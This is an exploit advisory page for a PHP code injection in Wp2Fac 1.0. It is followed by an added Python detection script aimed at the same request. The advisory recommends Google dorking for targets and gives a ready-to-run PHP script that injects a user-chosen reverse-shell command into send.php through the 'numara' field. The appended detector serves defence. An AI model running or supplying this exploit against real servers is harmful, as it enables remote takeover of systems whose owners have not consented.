## https://sploitus.com/exploit?id=PACKETSTORM:189698
=============================================================================================================================================
| # Title : Wp2Fac 1.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/metinyesil/wp2fac |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Code Description: Send a POST request using PHP to execute commands on the target server.
(Related : https://packetstorm.news/files/id/174555/ Related CVE numbers: ) .
[+] save code as poc.php.
[+] Usage: php script.php
[+] PayLoad :
<?php
function send_post_request($host, $revshell) {
    $url = "http://$host/send.php";
    $headers = [
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept: */*",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate",
        "Content-Type: application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With: XMLHttpRequest",
        "Origin: http://$host",
        "Connection: close",
        "Referer: http://$host/"
    ];
    $data = [
        "numara" => "1234567890 & $revshell &;"
    ];
    $options = [
        "http" => [
            "header" => implode("\r\n", $headers),
            "method" => "POST",
            "content" => http_build_query($data)
        ]
    ];
    $context = stream_context_create($options);
    $response = file_get_contents($url, false, $context);
    return $response;
}
$host = readline("Target IP: ");
$revshell = readline("Reverse Shell Command: ");
echo "Check your listener!\n";
echo send_post_request($host, $revshell);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
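
Added example, not part of the original advisory or the wp2fac project: a defender-side check that flags POST requests to send.php whose numara field carries shell metacharacters, the request shape the PoC above produces. It assumes numara is meant to hold a phone number of 7 to 15 digits; inspect_request, PHONE_RE, SHELL_META and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption (not from the advisory): a valid numara is a phone number.
PHONE_RE = re.compile(r"\+?[0-9]{7,15}")
# Characters a shell treats as separators, substitution, quoting or redirection.
SHELL_META = set("&;|`$<>(){}\\\n\r'\"")


def inspect_request(method, url, body):
    """Classify one request as 'ignore', 'ok' or 'alert', with reasons."""
    if method.upper() != "POST" or not urlsplit(url).path.endswith("/send.php"):
        return "ignore", []
    # parse_qs percent-decodes, so %26 in the body becomes & in the value.
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("numara", [])
    reasons = []
    if len(values) != 1:
        reasons.append(f"expected one numara field, got {len(values)}")
    for value in values:
        meta = sorted(SHELL_META.intersection(value))
        if meta:
            reasons.append("shell metacharacters: " + " ".join(map(repr, meta)))
        elif not PHONE_RE.fullmatch(value):
            reasons.append("value is not a phone number")
    return ("alert" if reasons else "ok"), reasons


# Constructed sample requests (method, URL, form body); the command is a placeholder.
SAMPLES = [
    ("POST", "/send.php", "numara=1234567890"),
    ("POST", "/send.php", "numara=1234567890+%26+PLACEHOLDER_CMD+%26%3B"),
    ("POST", "/send.php", "numara=1234567890 & PLACEHOLDER_CMD &;"),
    ("GET", "/index.php", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        verdict, reasons = inspect_request(method, url, body)
        print(f"{verdict:6} {method} {url} {body!r} {reasons}")
```

The same allow-list applied inside the application, before the value reaches any shell call, is the mitigation; the check above only covers traffic that is visible in decoded form, such as a reverse proxy or WAF audit log.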